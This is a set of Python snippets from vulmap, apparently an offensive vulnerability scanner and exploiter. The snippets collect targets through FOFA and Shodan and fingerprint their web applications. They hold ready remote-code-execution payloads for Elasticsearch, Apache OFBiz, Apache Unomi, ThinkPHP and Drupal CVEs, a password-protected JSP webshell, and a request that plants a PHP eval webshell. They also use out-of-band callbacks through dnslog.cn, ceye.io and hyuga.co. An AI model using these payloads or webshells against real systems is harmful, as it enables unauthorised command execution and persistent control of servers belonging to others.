Esempio n. 1
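 def __init__(self, url):
     """Normalise *url* to ``scheme://host:port`` and load the shared request settings.

     The scheme is taken from the parsed URL (the original matched the
     substrings ``https://`` / ``http://`` anywhere in the string, which a
     query parameter could satisfy). A missing port defaults to 443 for https
     and 80 for http; path, query and fragment are discarded.

     Args:
         url: Target URL, with or without a trailing slash.

     Raises:
         ValueError: if no hostname can be parsed from *url*.
     """
     # http.client.HTTPConnection._http_vsn_str = 'HTTP/1.1'
     self.url = url
     if self.url.endswith("/"):  # endswith: no IndexError on an empty string
         self.url = self.url[:-1]
     self.raw_data = None
     self.vul_info = {}
     self.ua = globals.get_value("UA")  # read global UA
     self.timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
     self.threadLock = threading.Lock()
     self.getipport = urlparse(self.url)
     self.hostname = self.getipport.hostname
     self.port = self.getipport.port
     scheme = self.getipport.scheme
     if self.port is None and scheme == "https":
         self.port = 443
     elif self.port is None and scheme == "http":
         self.port = 80
     if self.hostname is None:
         raise ValueError("URL has no hostname: " + url)
     if scheme in ("http", "https"):
         self.url = scheme + "://" + self.hostname + ":" + str(self.port)
     self.host = self.hostname + ":" + str(self.port)
     # The global HEADERS value was read and immediately overwritten in the
     # original; this per-target header set is the only one that was ever used.
     self.headers = {
         'Host': "" + self.host,
         'Accept': '*/*',
         'Connection': 'close',
         'Accept-Language': 'en',
         'User-Agent': self.ua,
         'Content-Type': 'application/x-www-form-urlencoded'
     }
     self.payload_cve_2014_3120 = r'''{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":''' \
                                  r'''{"command":{"script":"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec''' \
                                  r'''(\"RECOMMAND\").getInputStream()).useDelimiter(\"\\\\A\").next();"}}}'''
     self.payload_cve_2015_1427 = r'''{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"RECOMMAND\").getText()"}}}'''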
Esempio n. 2
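 def start(url, webapps_identify):
     """Fingerprint *url* and append the recognised product names to *webapps_identify*.

     A single GET is issued with the global User-Agent; if it fails for any
     reason the fingerprinters are handed the string "null" in place of a
     response, the sentinel the original passed on. When nothing is
     recognised, "all" is appended so that every PoC is run.

     Args:
         url: Target URL.
         webapps_identify: List that is mutated in place.
     """
     ua = globals.get_value("UA")  # read global UA
     timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
     headers = {'User-Agent': ua}
     try:
         resp = requests.get(url, headers=headers, timeout=timeout, verify=False)
     except Exception:
         # Best-effort probe: keep the "null" sentinel, but unlike the bare
         # except no longer swallow KeyboardInterrupt / SystemExit.
         resp = "null"
     # Local renamed from `start`, which shadowed this function's own name.
     identify = Identify(url)
     identify.flink(webapps_identify, resp, url)
     identify.tomcat(webapps_identify, resp, url)
     identify.fastjson(webapps_identify, url)  # the fastjson check takes no response
     identify.elasticsearch(webapps_identify, resp, url)
     identify.jenkins(webapps_identify, resp, url)
     identify.weblogic(webapps_identify, resp, url)
     identify.spring(webapps_identify, resp, url)
     identify.solr(webapps_identify, resp, url)
     identify.nexus(webapps_identify, resp, url)
     identify.jboss(webapps_identify, resp, url)
     identify.drupal(webapps_identify, resp, url)
     identify.struts2(webapps_identify, resp, url)
     identify.shiro(webapps_identify, resp, url)
     identify.druid(webapps_identify, resp, url)
     identify.eyou(webapps_identify, resp, url)
     identify.coremail(webapps_identify, resp, url)
     if webapps_identify:
         for name in webapps_identify:
             print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" The identification target is: " + name + "          ")))
     else:
         webapps_identify.append("all")
         print("\r{0}{1}".format(now.timed(de=0) + color.yel_info(), color.yellow(" Unable to identify target, Run all pocs           ")))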
Esempio n. 3
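 def scan_print(vul_info):
     """Print one PoC verdict and hand positive results to the output module.

     Args:
         vul_info: Result dict with the keys prt_resu, prt_name, vul_name,
             vul_type, vul_numb and prt_info.

     A missing key is reported as "[ERROR] file line" instead of raising; the
     original caught IndexError, which a dict lookup never raises, so the
     handler was unreachable.
     """
     try:
         delay = globals.get_value("DELAY")  # read global DELAY
         debug = globals.get_value("DEBUG")  # read global DEBUG
         result = vul_info["prt_resu"]
         prt_name = vul_info["prt_name"]
         vul_name = vul_info["vul_name"]
         vul_type = vul_info["vul_type"]
         vul_numb = vul_info["vul_numb"]
         info = vul_info["prt_info"]
         # Both positive verdicts share the same file output; only the prefix differs.
         positive_prefix = {
             "PoCSuCCeSS": "[+] The target is ",
             "PoC_MaYbE": "[?] The target maybe ",
         }
         if result in positive_prefix:
             print(now.timed(de=delay) + color.green(positive_prefix[result] + prt_name + " " + info))
             # Let the output module decide whether anything is written to file
             output("json", vul_info)
             output("text", "--> [名称:" + vul_name + "] [编号:" + vul_numb + "] [类型:" + vul_type + "] " + info)
         elif debug == "debug":
             print(now.timed(de=delay) + color.magenta("[-] The target no " + color.magenta(prt_name)))
         else:
             # Non-debug: carriage return so the next status line overwrites this one
             print("\r{0}{1}{2}".format(now.timed(de=delay),
                                        color.magenta("[-] The target no "),
                                        color.magenta(prt_name)), end="                           \r", flush=True)
     except (KeyError, IndexError) as error:
         tb = error.__traceback__
         print(now.timed(de=0) + color.red("[ERROR] " + tb.tb_frame.f_globals['__file__']
                                           + " " + str(tb.tb_lineno)))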
Esempio n. 4
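def _version_key(version):
    """Turn a dotted version string into a tuple usable for ordering.

    Numeric components compare as ints so "1.10" sorts after "1.9"; a
    component that is not an int compares as a string. The tag in the first
    slot keeps ints and strings from being compared with each other.
    """
    key = []
    for piece in version.strip().split("."):
        try:
            key.append((0, int(piece)))
        except ValueError:
            key.append((1, piece))
    return tuple(key)


def version_check():
    """Compare the running vulmap version with the one published on GitHub.

    Prints whether the local build is current, outdated or unknown. Network
    failures, and a GitHub page whose markup no longer matches the scraping
    regex, are reported as a failed check and never raised.
    """
    version = globals.get_value("VULMAP")  # read global VULMAP version
    timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
    headers = globals.get_value("HEADERS")  # read global HEADERS
    github_ver_url = "https://github.com/zhzyker/vulmap/blob/main/version"
    now_warn = now.timed(de=0) + color.red_warn()

    def _check_failed():
        print(now_warn + color.red(" The current version is: " + version +
                                   ", Version check filed"))

    try:
        github_ver_request = requests.get(url=github_ver_url,
                                          headers=headers,
                                          timeout=timeout)
        # Scrapes the rendered blob page. Non-greedy: with re.S a greedy
        # `.*` would run to the last </td> in the document, not the version cell.
        version_res = r'blob-code blob-code-inner js-file-line">(.*?)</td>'
        matches = re.findall(version_res, github_ver_request.text, re.S | re.M)
        if not matches:
            # Page layout changed (or the file is missing): same report as a
            # network failure rather than an IndexError traceback.
            _check_failed()
            return
        github_ver = matches[0].strip()
        if version == github_ver:
            print(
                now.timed(de=0) + color.yel_info() +
                color.yellow(" Currently the latest version: " + version))
        elif _version_key(version) < _version_key(github_ver):
            # Component-wise comparison; plain string `<` misorders "1.10" and "1.9".
            print(now_warn + color.red(" The current version is: " + version +
                                       ", Latest version: " + github_ver))
            print(now_warn + color.red(
                " Go to github https://github.com/zhzyker/vulmap update"))
        else:
            print(now_warn + color.red(" Unknown version: " + version))
    except (requests.exceptions.ConnectionError, requests.exceptions.Timeout):
        _check_failed()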
Esempio n. 5
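def fofa(fofa, size):
    """Query the FOFA search API and return the first field of every result row.

    Args:
        fofa: FOFA query expression; sent base64-encoded as ``qbase64``.
        size: Maximum number of results to request.

    Returns:
        List of the first column of each entry in the API's ``results``.

    Exits the process (status 0, as before) on a non-200 reply, a timeout, a
    connection failure, or a response that cannot be parsed.
    """
    timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
    headers = globals.get_value("HEADERS")  # read global HEADERS
    email = globals.get_value("fofa_email")
    key = globals.get_value("fofa_key")
    qbase = base64.b64encode(str.encode(fofa)).decode('ascii')
    api_tmpl = "https://fofa.so/api/v1/search/all?email={email}&key={key}&size={size}&qbase64={qbase}"
    api_url = api_tmpl.format(email=email, key=key, size=size, qbase=qbase)
    # The printed URL ends up in terminals and log files: never echo the API key.
    shown_url = api_tmpl.format(email=email, key="***", size=size, qbase=qbase)
    print(now.timed(de=0) + color.yel_info() + color.yellow(" Fofa api: " + shown_url))
    try:
        res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
        if res.status_code != 200:
            print(now.timed(de=0) + color.red_warn() + color.red(" " + res.text))
            exit(0)
        body = json.loads(res.text)
        return [row[0] for row in body['results']]
    except requests.exceptions.Timeout:
        print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because of timeout "))
        exit(0)
    except requests.exceptions.ConnectionError:
        print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because the connection failed "))
        exit(0)
    except Exception:
        # Covers JSON decode errors and an unexpected response shape (KeyError/IndexError).
        print(now.timed(de=0) + color.red_warn() + color.red(" Fofa API connection failed because unknown error "))
        exit(0)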
Esempio n. 6
    def __init__(self, url):
        self.url = url
        self.raw_data = None
        self.vul_info = {}
        self.ua = globals.get_value("UA")  # 获取全局变量UA
        self.timeout = globals.get_value("TIMEOUT")  # 获取全局变量UA
        self.headers = globals.get_value("HEADERS")  # 获取全局变量HEADERS
        self.threadLock = threading.Lock()
        self.payload_cve_2021_26295_poc = '''<?xml version='1.0' encoding='UTF-8'?>
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
        <ns1:cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff740010RECOMMAND74000071007e0005740004687474707078740017687474703a2f2fRECOMMAND78</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>'''

        self.payload_cve_2021_29200_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
  <soapenv:Header/>  
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key>
            <cus-obj>ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562E9FEDCC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707739000A556E69636173745265660010RECOMMAND0000005000000000600BBCF200000000000000000000000000000078</cus-obj>
          </map-Key>  
          <map-Value>  
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>'''

        self.payload_cve_2021_26295_exp_1 = '''<?xml version='1.0' encoding='UTF-8'?>
                        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                        <soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
                        <ns1:cus-obj>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</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>'''

        self.payload_cve_2021_26295_exp_2 = '''<?xml version='1.0' encoding='UTF-8'?>
                <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
                <soapenv:Header/><soapenv:Body><ns1:clearAllEntityCaches xmlns:ns1="http://ofbiz.apache.org/service/">
                <ns1:cus-obj>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</ns1:cus-obj></ns1:clearAllEntityCaches></soapenv:Body></soapenv:Envelope>'''

        self.payload_cve_2021_30128_poc = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
                <soapenv:Header/>
                <soapenv:Body>
                <ser>
                <map-HashMap>
                <map-Entry>
                <map-Key>
                <cus-obj>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</cus-obj>
                </map-Key>
                <map-Value>
                <std-String value="http://3zs56v.dnslog.cn"/>
                </map-Value>
                </map-Entry>
                </map-HashMap>
                </ser>
                </soapenv:Body>
                </soapenv:Envelope>'''

        self.payload_cve_2021_30128_exp = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
Esempio n. 7
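 def dnslog_cn():
     """Return a ``<random>.<dnslog domain>`` host for out-of-band DNS checks.

     The dnslog.cn domain is requested once and cached in the DNS_DNSLOG_HOST
     global; later calls only prepend a fresh random label. Returns the
     string "error" on any failure.

     NOTE(review): ``timeout`` is not defined in this function and is assumed
     to be a module-level name — confirm.
     """
     headers_dnslog = {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
         'Host': 'www.dnslog.cn',
         'Cookie':
         'UM_distinctid=1703200149e449-053d4e8089c385-741a3944-1fa400-1703200149f80a; PHPSESSID=jfhfaj7op8u8i5sif6d4ai30j4; CNZZDATA1278305074=1095383570-1581386830-null%7C1581390548',
         'Accept': '*/*',
         'Referer': 'http://www.dnslog.cn/',
         'Accept-Language': 'zh-CN,zh;q=0.9',
         'Connection': 'close'
     }
     dnslog_api = "http://www.dnslog.cn/getdomain.php?t=0.08025501698741366"
     cached_host = globals.get_value("DNS_DNSLOG_HOST")
     try:
         if cached_host is None:
             dns = requests.get(dnslog_api,
                                headers=headers_dnslog,
                                timeout=timeout,
                                verify=False)
             # An error page must not be cached as the dnslog domain.
             dns.raise_for_status()
             cached_host = dns.text
             globals.set_value("DNS_DNSLOG_HOST", cached_host)
         # Reuse the value already read instead of a second globals lookup.
         return random_md5() + "." + cached_host
     except Exception:
         return "error"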
Esempio n. 8
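 def hyuga_co():
     """Return a ``<random>.<hyuga identity>`` host, registering an identity on first use.

     While both hyuga_domain and hyuga_token still hold the "xxxxxx"
     placeholder a new identity is requested from the API and both globals are
     updated. Returns "bug" when only the domain is a placeholder, and None on
     any exception (the original's silent ``pass`` also returned None).

     NOTE(review): ``timeout`` is not defined in this function and is assumed
     to be a module-level name — confirm.
     """
     headers_hyuga = {
         'User-Agent':
         'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36',
         'Connection': 'close',
         'Accept': '*/*',
         'Accept-Language':
         'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6'
     }
     hyuga_api = "http://api.hyuga.co/v1/users"
     hyuga_host = globals.get_value("hyuga_domain")
     hyuga_token = globals.get_value("hyuga_token")
     try:
         if r"xxxxxx" not in hyuga_host:
             # Domain already configured: just prepend a fresh random label.
             return random_md5() + "." + hyuga_host
         if r"xxxxxx" not in hyuga_token:
             return "bug"
         # Neither domain nor token configured: obtain a new identity.
         dns = requests.post(hyuga_api,
                             headers=headers_hyuga,
                             timeout=timeout,
                             verify=False)
         data = json.loads(dns.text)["data"]  # parsed once instead of twice
         hyuga_host = data["identity"]
         hyuga_token = data["token"]
         globals.set_value("hyuga_token", hyuga_token)
         globals.set_value("hyuga_domain", hyuga_host)
         return random_md5() + "." + str(hyuga_host)
     except Exception:
         # Best-effort, as before; made explicit instead of an unused `as e: pass`.
         return None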
Esempio n. 9
 def __init__(self, url):
     """Store the target URL and pull the shared request settings from globals.

     Args:
         url: Target URL, stored unchanged.
     """
     self.url = url
     self.raw_data = None
     self.vul_info = {}
     self.threadLock = threading.Lock()
     # Shared request settings live in the globals module.
     for attr, key in (("ua", "UA"), ("timeout", "TIMEOUT"), ("headers", "HEADERS")):
         setattr(self, attr, globals.get_value(key))
Esempio n. 10
 def exploit_print(request, raw_data):
     """Print an exploit outcome.

     In debug mode the raw exchange is printed; otherwise the result text,
     unless it still carries the "PoC_WaTinG" marker, which is reported as a
     failed command execution.

     Args:
         request: Result text of the exploit step.
         raw_data: Raw request/response data shown in debug mode.
     """
     delay = globals.get_value("DELAY")  # read global DELAY
     debug = globals.get_value("DEBUG")  # read global DEBUG
     if debug == "debug":
         print(raw_data)
         return
     if r"PoC_WaTinG" in request:
         print(now.timed(de=delay) + color.red_warn() + color.magenta(" Command Executed Failed... ..."))
         return
     print(request)
Esempio n. 11
    def __init__(self, url):
        self.url = url
        self.raw_data = None
        self.vul_info = {}
        self.ua = globals.get_value("UA")  # 获取全局变量UA
        self.timeout = globals.get_value("TIMEOUT")  # 获取全局变量UA
        self.headers = globals.get_value("HEADERS")  # 获取全局变量HEADERS
        self.threadLock = threading.Lock()

        self.payload_time_2021_0515 = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
Esempio n. 12
 def ceye_io(md):
     """Return *md* if it appears in the ceye.io DNS records, otherwise None.

     NOTE(review): ``timeout`` is not defined in this function and is assumed
     to be a module-level name — confirm.
     """
     ceye_token = globals.get_value("ceye_token")
     headers = globals.get_value("HEADERS")  # read global HEADERS
     api_url = "http://api.ceye.io/v1/records?type=dns&token=" + ceye_token
     res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
     return md if md in res.text else None
Esempio n. 13
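def survival_check(url):
    """Return "s" if a GET to *url* completes, "f" if the request fails.

    Uses the global TIMEOUT and HEADERS; any HTTP status counts as alive.
    Connection errors, timeouts and URLs that ``requests`` rejects as invalid
    all map to "f" (the InvalidURL case matches the sibling ``_http_conn``).
    """
    try:
        timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
        headers = globals.get_value("HEADERS")
        target = url_check(url)
        requests.get(target, timeout=timeout, headers=headers, verify=False)
        return "s"
    except (requests.exceptions.ConnectionError,
            requests.exceptions.Timeout,
            requests.exceptions.InvalidURL):
        return "f"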
Esempio n. 14
 def error_print(prt_name):
     """Report that *prt_name* was not found on the target.

     In debug mode the line is printed normally; otherwise it ends with a
     carriage return so the next status line overwrites it.
     """
     delay = globals.get_value("DELAY")  # read global DELAY
     debug = globals.get_value("DEBUG")  # read global DEBUG
     stamp = now.timed(de=delay)
     if debug == "debug":
         print(stamp + color.magenta("[-] The target no " + color.magenta(prt_name)))
         return
     line = "\r{0}{1}{2}".format(stamp,
                                 color.magenta("[-] The target no "),
                                 color.magenta(prt_name))
     print(line, end="                            \r", flush=True)
Esempio n. 15
 def connection_print(prt_name):
     """Report that the *prt_name* check could not connect to the target.

     Debug mode prints a full line; otherwise the line ends with a carriage
     return so the next status line overwrites it.
     """
     delay = globals.get_value("DELAY")  # read global DELAY
     debug = globals.get_value("DEBUG")  # read global DEBUG
     stamp = now.timed(de=delay)
     if debug == "debug":
         print(stamp + color.red_warn() +
               color.cyan(" " + prt_name + " check failed because unable to connect !!!"))
         return
     line = "\r{0}{1}{2}".format(stamp,
                                 color.red_warn(),
                                 color.cyan(" " + prt_name + " connection failed !!!"))
     print(line, end="                            \r", flush=True)
Esempio n. 16
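def ceye():
    """Fetch the DNS records registered for the configured ceye.io token.

    Prints a warning when the API answers with a non-200 status.

    Returns:
        The raw response body, whatever the status code.
    """
    timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
    headers = globals.get_value("HEADERS")  # read global HEADERS
    # ceye_domain was read but never used; the duplicated token read is gone too.
    ceye_token = globals.get_value("ceye_token")
    api_url = "http://api.ceye.io/v1/records?type=dns&token=" + ceye_token
    res = requests.get(api_url, headers=headers, timeout=timeout, verify=False)
    if res.status_code != 200:
        print(
            now.timed(de=0) + color.red_warn() +
            color.red(" Ceye.io: " + res.text))
    return res.text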
Esempio n. 17
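    def __init__(self, url):
        """Strip a trailing ``/#/overview`` dashboard fragment from *url* and load shared settings.

        Args:
            url: Target URL; a trailing ``/#/overview`` or ``/#/overview/`` is removed.
        """
        self.url = url
        # Only a trailing fragment is removed. The original sliced a fixed
        # number of characters whenever the text appeared anywhere in the URL,
        # which chopped the wrong characters if it was not at the end.
        for suffix in ("/#/overview/", "/#/overview"):
            if self.url.endswith(suffix):
                self.url = self.url[:-len(suffix)]

        self.raw_data = None
        self.vul_info = {}
        self.ua = globals.get_value("UA")  # read global UA
        self.timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
        self.headers = globals.get_value("HEADERS")  # read global HEADERS
        self.threadLock = threading.Lock()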
Esempio n. 18
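 def __init__(self, url):
     """Store *url* without its trailing slash and load the shared request settings.

     Args:
         url: Target URL; one trailing "/" is removed.
     """
     self.url = url
     if self.url.endswith("/"):  # endswith: no IndexError on an empty string
         self.url = self.url[:-1]
     self.raw_data = None
     self.vul_info = {}
     self.ua = globals.get_value("UA")  # read global UA
     self.timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
     self.headers = globals.get_value("HEADERS")  # read global HEADERS
     self.threadLock = threading.Lock()
     self.payload_cve_2020_13942 = '''{ "filters": [ { "id": "myfilter1_anystr", "filters": [ { "condition": {''' \
                                   '''"parameterValues": {  "": "script::Runtime r = Runtime.getRuntime(); ''' \
                                   '''r.exec(\\"RECOMMAND\\");" }, "type": "profilePropertyCondition" } } ] } ''' \
                                   '''], "sessionId": "test-demo-session-id_anystr" }'''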
Esempio n. 19
 def __init__(self, url):
     """Store the target URL, the shared request settings and the JSP template.

     Args:
         url: Target URL, stored unchanged.
     """
     self.url = url
     self.raw_data = None
     self.vul_info = {}
     self.threadLock = threading.Lock()
     # Shared request settings live in the globals module.
     for attr, key in (("ua", "UA"), ("timeout", "TIMEOUT"), ("headers", "HEADERS")):
         setattr(self, attr, globals.get_value(key))
     self.jsp_webshell = '<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><' \
                         '%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro =' \
                         ' Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInpu' \
                         'tStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.cl' \
                         'ose();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("password".equ' \
                         'als(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCm' \
                         'd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>'
Esempio n. 20
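 def __init__(self, url):
     """Store *url* without its trailing slash and load the shared request settings.

     Args:
         url: Target URL; one trailing "/" is removed.
     """
     self.url = url
     if self.url.endswith("/"):  # endswith: no IndexError on an empty string
         self.url = self.url[:-1]
     self.raw_data = None
     self.vul_info = {}
     self.ua = globals.get_value("UA")  # read global UA
     self.timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
     self.headers = globals.get_value("HEADERS")  # read global HEADERS
     self.threadLock = threading.Lock()
     self.payload_cve_2018_20062 = "_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=RECOMMAND"
     self.payload_cve_2019_9082 = ("/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&"
                                   "vars[0]=system&vars[1][]=RECOMMAND")
     self.payload_cve_2019_9082_webshell = ("/index.php/?s=/index/\\think\\app/invokefunction&function="
                                            "call_user_func_array&vars[0]=file_put_contents&vars[1][]=FILENAME&vars[1][]=<?php%20eval"
                                            "(@$_POST[%27SHELLPASS%27]);?>")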
Esempio n. 21
def output(types, item):
    """Route *item* to the text or json writer when that output is configured.

    Args:
        types: "text" or "json"; anything else is ignored.
        item: Payload handed to the matching writer.

    Any exception from the writers is printed as "[ERROR] file line".
    """
    try:
        o_text = globals.get_value("O_TEXT")
        o_json = globals.get_value("O_JSON")
        if types == "text" and o_text:
            output_text(o_text, item)
        elif types == "json" and o_json:
            output_json(o_json, item)
    except Exception as error:
        tb = error.__traceback__
        print(
            now.timed(de=0) +
            color.red("[ERROR] " + tb.tb_frame.f_globals['__file__'] +
                      " " + str(tb.tb_lineno)))
Esempio n. 22
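def proxy_set(pr, pr_mode):
    """Route every socket in this process through the proxy *pr* and report its egress IP.

    Args:
        pr: Proxy address as ``host:port``.
        pr_mode: Proxy type; a value containing "socks" selects SOCKS5,
            one containing "http" an HTTP proxy.

    Exits the process with a usage message when *pr* is not ``host:port``
    with a numeric port (the original only caught a missing colon; a
    non-numeric port raised an unhandled ValueError).
    """
    headers = globals.get_value("HEADERS")  # read global HEADERS
    # Split on the last colon so the host part is everything before it.
    proxy_ip, sep, port_text = pr.rpartition(":")
    try:
        if not sep:
            raise ValueError("missing ':' in proxy address")
        proxy_port = int(port_text)
    except ValueError:
        print(
            now.timed(de=0) + color.red_warn() + color.red(
                " Proxy format error (e.g. --proxy-socks 127.0.0.1:1080)"))
        sys.exit(0)
    if r"socks" in pr_mode:
        socks.set_default_proxy(socks.SOCKS5, proxy_ip, proxy_port)
    elif r"http" in pr_mode:
        socks.set_default_proxy(socks.HTTP, addr=proxy_ip, port=proxy_port)
    # Process-wide monkeypatch: every later socket goes through the proxy.
    socket.socket = socks.socksocket
    try:
        proxy_ip_info = requests.get("http://api.hostip.info/get_json.php",
                                     headers=headers,
                                     timeout=5)
        proxy_ip_info_json = json.loads(proxy_ip_info.text)
        proxy_ip_info_dict = ("[region: " + proxy_ip_info_json["country_name"] + "] " +
                              "[city: " + proxy_ip_info_json["city"] + "] " +
                              "[proxy ip: " + proxy_ip_info_json["ip"] + "]")
    except (requests.exceptions.ConnectionError,
            requests.exceptions.Timeout,
            ValueError,   # body is not JSON
            KeyError):    # JSON without the expected fields
        proxy_ip_info_dict = "[region: ???] [city: ???] [proxy ip: ???]"
    print(
        now.timed(de=0) + color.yel_info() +
        color.yellow(" Use custom proxy: " + pr))
    print(
        now.timed(de=0) + color.yel_info() +
        color.yellow(" Proxy info: " + proxy_ip_info_dict))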
Esempio n. 23
 def _http_conn(url):
     """Return "s" if a GET to *url* completes, "f" if the request fails.

     Uses the global TIMEOUT and HEADERS; any HTTP status counts as success.
     """
     try:
         timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
         headers = globals.get_value("HEADERS")
         target = url_check(url)
         requests.get(target, timeout=timeout, headers=headers, verify=False)
     except (requests.exceptions.ConnectionError,
             requests.exceptions.Timeout,
             # add by https://github.com/zhzyker/vulmap/issues/30 @zilong3033 fix url extract
             requests.exceptions.InvalidURL):
         return "f"
     return "s"
Esempio n. 24
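 def __init__(self, url):
     """Store *url* without its trailing slash and load the shared request settings.

     Args:
         url: Target URL; one trailing "/" is removed.
     """
     self.url = url
     if self.url.endswith("/"):  # endswith: no IndexError on an empty string
         self.url = self.url[:-1]
     self.raw_data = None
     self.vul_info = {}
     self.ua = globals.get_value("UA")  # read global UA
     self.timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
     self.headers = globals.get_value("HEADERS")  # read global HEADERS
     self.threadLock = threading.Lock()
     self.payload_cve_2018_7600 = (
         "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail"
         "[#type]=markup&mail[#markup]=RECOMMAND")
     self.payload_cve_2019_6340 = "{\r\n\"link\":[\r\n{\r\n\"value\":\"link\",\r\n\"options\":\"O:24:\\\"" \
                                  "GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\"" \
                                  ";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp" \
                                  "\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
                                  "u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
                                  "u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve" \
                                  "\\\";}}\"\r\n}\r\n],\r\n\"_links\":{\r\n\"type\":{\r\n\"href\":\"%s/rest/type/shortcut/default" \
                                  "\"\r\n}\r\n}\r\n}"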
Esempio n. 25
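def shodan_api(shodan_keyword):
    """Search Shodan for *shodan_keyword* and return ``ip:port`` strings.

    Args:
        shodan_keyword: Shodan search query.

    Returns:
        List of "ip_str:port" for every match.

    Exits the process (status 0, as before) when the Shodan client raises
    APIError. The original wrote ``shodan_key.APIError`` — an attribute lookup
    on the key string — so the handler itself raised AttributeError.
    """
    try:
        shodan_key = globals.get_value("shodan_key")
        api = shodan.Shodan(shodan_key)
        res = api.search(shodan_keyword)
        return ["%s:%s" % (result['ip_str'], result['port']) for result in res['matches']]
    except shodan.APIError as e:
        print(now.timed(de=0) + color.red_warn() + color.red(" Shodan api: " + str(e)))
        exit(0)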
Esempio n. 26
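 def __init__(self, url):
     """Normalise *url* to ``scheme://host:port`` and load the shared request settings.

     The scheme is taken from the parsed URL (the original matched the
     substrings ``https://`` / ``http://`` anywhere in the string). A missing
     port defaults to 443 for https and 80 for http; path, query and fragment
     are discarded. A URL without an http/https scheme is left as given.

     Args:
         url: Target URL, with or without a trailing slash.

     Raises:
         ValueError: if the URL has an http/https scheme but no hostname.
     """
     self.url = url
     self.raw_data = None
     self.vul_info = {}
     self.r = "PoC_WaTinG"
     self.ua = globals.get_value("UA")  # read global UA
     self.timeout = globals.get_value("TIMEOUT")  # read global TIMEOUT
     self.headers = globals.get_value("HEADERS")  # read global HEADERS
     self.threadLock = threading.Lock()
     # Change the url format to conform to the program
     if self.url.endswith("/"):  # endswith: no IndexError on an empty string
         self.url = self.url[:-1]
     self.getipport = urlparse(self.url)
     self.hostname = self.getipport.hostname
     self.port = self.getipport.port
     scheme = self.getipport.scheme
     if self.port is None and scheme == "https":
         self.port = 443
     elif self.port is None and scheme == "http":
         self.port = 80
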